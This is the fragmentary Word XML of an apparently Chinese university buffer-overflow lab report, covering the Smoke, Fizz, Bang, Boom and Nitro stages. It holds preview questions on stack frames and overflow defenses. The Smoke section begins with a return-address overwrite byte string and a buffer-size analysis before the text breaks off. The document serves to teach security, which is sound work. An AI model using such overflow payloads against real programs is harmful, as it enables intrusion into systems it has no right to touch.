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5878E8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2350" cy="42545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3849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>四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3849A6">
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Buf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3849A6">
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>缓冲器漏洞攻击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01247F" w:rsidRDefault="0001247F" w:rsidP="0001247F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01247F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01247F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:rsidR="0001247F" w:rsidRPr="002F5572" w:rsidRDefault="0001247F" w:rsidP="0001247F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01247F" w:rsidRPr="002F5572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01247F" w:rsidRPr="003E6724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1247F" w:rsidRPr="003E6724" w:rsidRDefault="0001247F" w:rsidP="0001247F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2021.5.07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:rsidR="00C630FD" w:rsidRPr="0001247F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3849A6" w:rsidRPr="00974031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175205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实验基本信息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6" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">1.1 </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>实验目的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07" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">1.2 </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>实验环境与工具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8" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">1.2.1 </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>硬件环境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09" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">1.2.2 </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>软件环境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_Toc497175209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7175210" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">1.2.3 </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>开发工具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1" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">1.3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- 3 -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2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2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实验预习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3" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">2.1 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32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4" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>请按照入栈顺序，写出</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>C</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>语言</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>62</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>位环境下的栈帧结构（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5" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.3</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>请简述缓冲区溢出的原理及危害（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6" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.4</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>请简述缓冲器溢出漏洞的攻击方法（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7" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.5</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>请简述缓冲器溢出漏洞的防范方法（</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>分）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- 4 -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18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3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各阶段漏洞攻击原理与方法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_Toc497175218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19" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1 Smoke</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>阶段</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1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_Toc497175219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0" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2 Fizz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_Toc497175220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1" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.3 Bang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_Toc497175221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2" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.4 Boom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_Toc497175222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3" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.5 Nitro</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>的攻击与分析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_Toc497175223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- 5 -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4" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>第</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>章</w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>总结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_Toc497175224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5" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">4.1 </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>请总结本次实验的收获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_Toc497175225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7175226" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">4.2 </w:t>
        </w:r>
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>请给出对本次实验内容的建议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_Toc497175226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- 6 -</w:t>
        </w:r>
        <w:r w:rsidR="003849A6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003849A6" w:rsidRPr="00974031" w:rsidRDefault="009D78D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7175227" w:history="1">
        <w:r w:rsidR="003849A6" w:rsidRPr="00E10150">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:noProof/>
          </w:rPr>
          <w:t>参考文献</w:t>
        </w:r>
        <w:r w:rsidR="003849A6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003849A6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003849A6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc497175227 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003849A6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003849A6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="003849A6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>- 7 -</w:t>
        </w:r>
        <w:r w:rsidR="003849A6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497175205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7175206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85140B" w:rsidRPr="0085140B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5140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>理解</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>语言函数的汇编级实现及缓冲器溢出原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085140B" w:rsidRPr="0085140B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5140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>掌握栈帧结构与缓冲器溢出漏洞的攻击设计方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E36173" w:rsidRPr="003E6724" w:rsidRDefault="0085140B" w:rsidP="0085140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85140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进一步熟练使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下的调试工具完成机器语言的跟踪调试</w:t>
      </w:r>
    </w:p>
    <w:p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497175207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B56455" w:rsidRDefault="00B56455" w:rsidP="00B56455">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc250450168"/>
      <w:bookmarkStart w:id="11" w:name="_Toc225579644"/>
      <w:bookmarkStart w:id="12" w:name="_Toc67224660"/>
      <w:bookmarkStart w:id="13" w:name="_Toc69046955"/>
      <w:bookmarkStart w:id="14" w:name="_Toc71204557"/>
      <w:bookmarkStart w:id="15" w:name="_Toc497175211"/>
      <w:r>
        <w:t xml:space="preserve">1.2.1 </w:t>
      </w:r>
      <w:r>
        <w:t>硬件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/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:rsidR="00B56455" w:rsidRDefault="00B56455" w:rsidP="00B56455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:rsidR="00B56455" w:rsidRDefault="00B56455" w:rsidP="00B56455">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc250450169"/>
      <w:bookmarkStart w:id="17" w:name="_Toc67224661"/>
      <w:bookmarkStart w:id="18" w:name="_Toc69046956"/>
      <w:bookmarkStart w:id="19" w:name="_Toc71204558"/>
      <w:r>
        <w:t xml:space="preserve">1.2.2 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t>软件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/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:rsidR="00B56455" w:rsidRDefault="00B56455" w:rsidP="00B56455">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc67224662"/>
      <w:bookmarkStart w:id="21" w:name="_Toc69046957"/>
      <w:bookmarkStart w:id="22" w:name="_Toc71204559"/>
      <w:r>
        <w:t xml:space="preserve">1.2.3 </w:t>
      </w:r>
      <w:r>
        <w:t>开发工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00B56455" w:rsidRDefault="00B56455" w:rsidP="00B56455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5"/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上实验课前，必须认真预习实验指导书（</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PPT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PDF</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）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了解实验的目的、实验环境与软硬件工具、实验操作步骤，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复习与实验有关的理论知识。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请按照入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顺序，写出</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>语言</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>位环境下的栈帧结构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请按照入</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>顺序，写出</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>语言</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="0085140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>位环境下的栈帧结构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请简述缓冲区溢出的原理及危害</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085140B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请简述缓冲器溢出漏洞的攻击方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003363A4" w:rsidRPr="0085140B" w:rsidRDefault="0085140B" w:rsidP="0085140B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85140B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请简述缓冲器溢出漏洞的防范方法</w:t>
      </w:r>
      <w:r w:rsidR="00D3750E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E36173" w:rsidRPr="00F84B53" w:rsidRDefault="00E36173" w:rsidP="00F84B53">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc225579646"/>
      <w:bookmarkStart w:id="24" w:name="_Toc250450171"/>
      <w:bookmarkStart w:id="25" w:name="_Toc497175212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23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25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3849A6" w:rsidRPr="003849A6" w:rsidRDefault="00895229" w:rsidP="003849A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc225579647"/>
      <w:bookmarkStart w:id="27" w:name="_Toc250450172"/>
      <w:bookmarkStart w:id="28" w:name="_Toc497175213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6"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="00D5102C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003849A6" w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请按照入</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003849A6" w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003849A6" w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺序，写出C语言32位环境下的栈帧结构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8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29" w:name="_Toc497175214"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请按照入</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺序，写出C语言62位环境下的栈帧结构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9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30" w:name="_Toc497175215"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.3</w:t>
      </w:r>
      <w:r w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请简述缓冲区溢出的原理及危害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0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3849A6" w:rsidRDefault="003849A6" w:rsidP="003849A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc497175216"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请简述缓冲器溢出漏洞的攻击方法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1"/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Default="003849A6" w:rsidP="003849A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc497175217"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.5</w:t>
      </w:r>
      <w:r w:rsidRPr="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请简述缓冲器溢出漏洞的防范方法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32"/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33" w:name="_Toc225579651"/>
      <w:bookmarkStart w:id="34" w:name="_Toc250450175"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00F45755" w:rsidRPr="00F84B53" w:rsidRDefault="00F45755" w:rsidP="00F84B53">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc497175218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</w:t>
      </w:r>
      <w:r w:rsidR="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞攻击原理与方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p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3849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00253D90">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分</w:t>
      </w:r>
      <w:r w:rsidR="00253D90">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文本</w:t>
      </w:r>
      <w:r w:rsidR="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00253D90">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00993C2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分，分析</w:t>
      </w:r>
      <w:r w:rsidR="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00253D90">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00993C2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分</w:t>
      </w:r>
      <w:r w:rsidR="00253D90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 w:rsidR="003849A6"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</w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc49717521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3849A6">
        <w:t>Smoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段1的</w:t>
      </w:r>
      <w:r w:rsidR="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击与分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/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</w:t>
      </w:r>
      <w:r w:rsidR="00924264">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：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Pr="001F47C0" w:rsidRDefault="001F47C0" w:rsidP="001F47C0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>19 10 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924264" w:rsidRDefault="003849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</w:t>
      </w:r>
      <w:r w:rsidR="00FF7501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidR="00924264">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72E0E" w:rsidRDefault="008E68CA" w:rsidP="001F47C0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的</w:t>
      </w:r>
      <w:r w:rsidR="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反汇编代码可知，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈帧是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="004A730B">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区的大小</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="004A730B" w:rsidRPr="004A730B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x28</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
